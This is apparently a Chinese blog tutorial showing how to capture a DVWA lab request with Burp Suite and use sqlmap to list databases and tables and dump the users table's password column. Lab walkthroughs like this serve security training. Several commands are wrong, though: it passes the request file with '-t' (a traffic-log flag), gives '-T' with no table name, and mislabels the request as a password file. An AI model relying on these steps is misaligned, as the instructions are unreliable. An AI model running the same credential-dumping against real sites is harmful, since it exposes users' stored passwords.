Loading... 设置浏览器本地代理 1,浏览器设置本地代理-[不同的浏览器有不同的设置方法]  Burp Suite设置代理界面 2,BP抓包软件:Burp Suite设置本地代理  设置DVWA难度等级medium 3,浏览器打开DVWA -->DVWA Securlity-->设置难度等级Medium为中级 ,点击Submit  DVWA注入界面 4,浏览器打开DVWA-->SQL Injection-->submit 监听拦截界面 5,打开拦截,拦截到这个界面就行。  6,urp Suite 监听到数据包,右键Copy to file 保存到/root/1.txt 7,打开终端,输入命令 sqlmap -t /root/1.txt --dbs #获取所有库 sqlmap -t /root/1.txt -D dvwa -T --tables#获取所有表 sqlmap -t /root/1.txt -D dvwa -T users --columns #获取所有字段 sqlmap -t /root/1.txt -D dvwa -T users -C password --dump #获取所有字段的值 --dbs #获取所有数据库 --tables #获取所有表 --columns #获取所有字段 --dump 获取值 -D #后跟数据库 -T #后跟表名 -C #后跟字段名 /root/1.txt:是密码文件,自己可以写。 dvwa是一个数据库,可以更改 users是dvwa数据库中的表 password 是users 里面的字段 具体操作图片展示: sqlmap --dbs 获取所有数据库  sqlmap --tables 获取表  sqlmap --columns获取所有字段  sqlmap --dump获取password 字段的值  最后修改:2019 年 10 月 13 日 05 : 33 PM © 允许规范转载 赞赏 如果觉得我的文章对你有用,请随意赞赏 ×Close 赞赏作者 扫一扫支付 支付宝支付 微信支付